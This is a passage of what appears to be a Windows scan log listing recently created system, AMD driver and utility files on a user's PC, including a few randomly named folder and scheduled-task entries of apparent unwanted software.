2016-04-15 17:10 - 2016-03-16 06:11 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 00700256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-04-15 17:10 - 2016-03-16 06:08 - 00151552 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-04-15 17:10 - 2016-03-16 06:06 - 00181088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-04-15 17:10 - 2016-03-16 06:05 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-04-15 17:10 - 2016-03-16 06:03 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-04-15 17:10 - 2016-03-16 06:03 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-04-15 17:10 - 2016-03-16 06:00 - 21859840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-04-15 17:10 - 2016-03-16 05:56 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2016-04-15 17:10 - 2016-03-16 05:56 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModelShim.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00183296 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-04-15 17:10 - 2016-03-16 05:51 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-04-15 17:10 - 2016-03-16 05:51 - 00334848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-04-15 17:10 - 2016-03-16 05:49 - 01416192 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-04-15 17:10 - 2016-03-16 05:49 - 00850432 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00511488 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-04-15 17:10 - 2016-03-16 05:46 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2016-04-15 17:10 - 2016-03-16 05:44 - 01016832 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-04-15 17:10 - 2016-03-16 05:43 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2016-04-15 17:10 - 2016-03-16 05:43 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 02180608 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 01290240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2016-04-15 17:10 - 2016-03-16 05:41 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00931840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00280576 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00158208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSip.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 03363328 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-04-15 17:10 - 2016-03-16 05:38 - 01423872 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 01521664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00752640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 01205248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00068608 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenanceClient.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 01794560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00607744 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxApplicabilityEngine.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2016-04-15 17:10 - 2016-03-16 05:34 - 01871872 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2016-04-15 17:10 - 2016-03-16 05:33 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-04-15 17:10 - 2016-03-16 05:32 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-04-15 17:10 - 2016-03-16 05:28 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwbase.dll
2016-04-15 17:10 - 2016-03-16 05:27 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfapigp.dll
2016-04-15 17:10 - 2016-03-16 05:21 - 18796544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-04-15 17:10 - 2016-03-16 05:20 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-04-15 17:10 - 2016-03-16 05:18 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-04-15 17:10 - 2016-03-16 05:18 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 03680256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00842240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vaultcli.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxSip.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-04-15 17:10 - 2016-03-16 05:16 - 00311808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00625152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00579584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00928256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00525312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00131072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PimIndexMaintenanceClient.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-04-15 17:10 - 2016-03-16 05:12 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2016-04-15 17:10 - 2016-03-16 05:11 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2016-04-15 17:10 - 2016-03-16 05:10 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-04-15 16:58 - 2016-04-15 16:58 - 00000000 ____D C:\ProgramData\FwinpF
2016-04-12 18:21 - 2016-04-15 18:00 - 00000000 ____D C:\WINDOWS\Panther
2016-04-12 16:42 - 2016-04-12 16:42 - 00194320 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\TeeDriverW8x64.sys
2016-04-11 20:03 - 2016-04-11 23:21 - 00002278 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-04-11 20:03 - 2016-04-11 20:03 - 00000870 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-04-11 20:03 - 2016-04-11 20:03 - 00000000 ____D C:\Program Files\CCleaner
2016-04-11 15:49 - 2016-04-11 15:49 - 00002904 _____ C:\WINDOWS\System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance
2016-04-11 13:27 - 2016-04-11 13:27 - 00001299 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Radeon Settings.lnk
2016-04-10 22:05 - 2016-04-10 22:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2016-04-10 21:55 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\PlaysTV
2016-04-10 21:55 - 2016-04-10 21:55 - 00002099 _____ C:\Users\Public\Desktop\Raptr.lnk
2016-04-10 21:55 - 2016-04-10 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Raptr
2016-04-10 21:55 - 2016-04-10 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2016-04-10 21:54 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Raptr
2016-04-10 17:33 - 2016-04-11 15:26 - 00000000 ____D C:\ProgramData\Xfire
2016-04-10 17:33 - 2016-04-11 13:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Xfire
2016-04-10 17:32 - 2016-04-10 17:32 - 00002217 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-04-10 17:32 - 00002205 _____ C:\Users\Public\Desktop\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-03-29 12:06 - 00053008 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\TURegOpt.exe
2016-04-10 17:32 - 2016-03-29 11:53 - 00044304 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\authuitu.dll
2016-04-10 17:32 - 2016-03-29 11:53 - 00039696 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\SysWOW64\authuitu.dll
2016-04-10 17:31 - 2016-04-19 12:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Users\Harun\AppData\Local\AvgSetupLog
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\ProgramData\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Program Files (x86)\AVG
2016-04-05 09:41 - 2016-04-05 09:41 - 00874000 _____ (AMD) C:\WINDOWS\system32\SETAA8A.tmp
2016-04-05 09:41 - 2016-04-04 04:25 - 00865280 _____ (AMD) C:\WINDOWS\system32\coinst_16.15.dll
2016-04-05 08:47 - 2016-04-05 08:47 - 00365824 _____ C:\WINDOWS\system32\ativvaxy_el_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00322612 _____ C:\WINDOWS\system32\ativvaxy_vi.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00320944 _____ C:\WINDOWS\system32\ativvaxy_vi_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00264736 _____ C:\WINDOWS\system32\ativvaxy_stn_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00260640 _____ C:\WINDOWS\system32\ativvaxy_cz_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00254804 _____ C:\WINDOWS\system32\ativvaxy_FJ.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00251856 _____ C:\WINDOWS\system32\ativvaxy_FJ_nd.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00857576 _____ C:\WINDOWS\system32\amdicdxx.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00234292 _____ C:\WINDOWS\system32\ativvaxy_cik.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00232496 _____ C:\WINDOWS\system32\ativvaxy_cik_nd.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00177280 _____ C:\WINDOWS\system32\ativce03.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00175584 _____ C:\WINDOWS\system32\amde31a.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00166624 _____ C:\WINDOWS\system32\amde34b.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00166624 _____ C:\WINDOWS\system32\amde34a.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00100832 _____ C:\WINDOWS\system32\ativce02.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00009184 _____ C:\WINDOWS\system32\AMDKernelEvents.man
2016-04-05 08:46 - 2016-04-05 08:46 - 00000144 _____ C:\WINDOWS\SysWOW64\amd-vulkan32.json
2016-04-05 08:46 - 2016-04-05 08:46 - 00000144 _____ C:\WINDOWS\system32\amd-vulkan64.json
2016-04-04 06:16 - 2016-04-04 06:16 - 00458472 _____ C:\WINDOWS\system32\amdmiracast.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00141792 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00128384 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00110880 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2016-04-04 06:12 - 2016-04-04 06:12 - 00296648 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Drivers\amdacpksd.sys
2016-04-04 05:32 - 2016-04-04 05:32 - 00701440 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2016-04-04 05:30 - 2016-04-04 05:30 - 00580096 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2016-04-04 05:29 - 2016-04-04 05:29 - 00127488 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 06884864 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 00113664 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2016-04-04 05:27 - 2016-04-04 05:27 - 00235008 _____ C:\WINDOWS\system32\clinfo.exe
2016-04-04 05:26 - 2016-04-04 05:26 - 48211968 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl64.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00065024 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00059392 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2016-04-04 05:15 - 2016-04-04 05:15 - 26887168 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl12cl64.dll
2016-04-04 05:11 - 2016-04-04 05:11 - 06956032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2016-04-04 05:02 - 2016-04-04 05:02 - 05398016 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmantle32.dll
2016-04-04 05:00 - 2016-04-04 05:00 - 05420032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00134656 _____ C:\WINDOWS\system32\amdhdl64.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00123392 _____ C:\WINDOWS\SysWOW64\amdhdl32.dll
2016-04-04 04:47 - 2016-04-04 04:47 - 30377984 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atio6axx.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\system32\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00097280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00089600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2016-04-04 04:37 - 2016-04-04 04:37 - 08473088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2016-04-04 04:25 - 2016-04-04 04:25 - 25069056 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atioglxx.dll
2016-04-04 04:22 - 2016-04-04 04:22 - 06667776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00367104 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2016-04-04 04:14 - 2016-04-04 04:14 - 00062464 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalrt64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00055808 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalcl64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00052224 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalrt.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 15711744 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticaldd64.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 00049152 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalcl.dll
2016-04-04 04:10 - 2016-04-04 04:10 - 14302208 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticaldd.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00564736 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00224256 _____ C:\WINDOWS\system32\dgtrayicon.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00209920 _____ C:\WINDOWS\system32\GameManager64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00204800 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00189952 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00186368 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00162304 _____ C:\WINDOWS\system32\atieah64.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00145408 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00078336 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2016-04-04 03:56 - 2016-04-04 03:56 - 00251392 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2016-04-04 03:55 - 2016-04-04 03:55 - 00190976 _____ (AMD) C:\WINDOWS\system32\atitmm64.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00050688 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmmcl6.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00039424 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmmcl.dll
2016-04-04 03:52 - 2016-04-04 03:52 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2016-04-04 03:42 - 2016-04-04 03:42 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2016-04-04 03:34 - 2016-04-04 03:34 - 00089088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2016-04-04 03:34 - 2016-04-04 03:34 - 00080896 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00157696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00075776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6pxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiglpxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiglpxx.dll
2016-04-04 03:29 - 2016-04-04 03:29 - 00043520 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\ati2erec.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00195072 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00174592 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2016-04-03 23:27 - 2016-04-03 23:27 - 02412544 _____ C:\WINDOWS\system32\amdacpusl.pdb
2016-04-03 23:16 - 2016-04-03 23:16 - 00364544 _____ (Advanced Micro Devices) C:\WINDOWS\system32\amdacpusl.dll
2016-04-03 23:16 - 2016-04-03 23:16 - 00306176 _____ C:\WINDOWS\system32\amdacpusl.pdb.pub
2016-04-03 23:16 - 2016-04-03 23:16 - 00248832 _____ (Advanced Micro Devices) C:\WINDOWS\SysWOW64\amdacpusl.dll
2016-04-01 10:14 - 2016-04-10 20:40 - 00000000 ____D C:\Program Files (x86)\eAHPeNhIUJ
2016-04-01 10:14 - 2016-04-01 20:34 - 00014860 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateUA
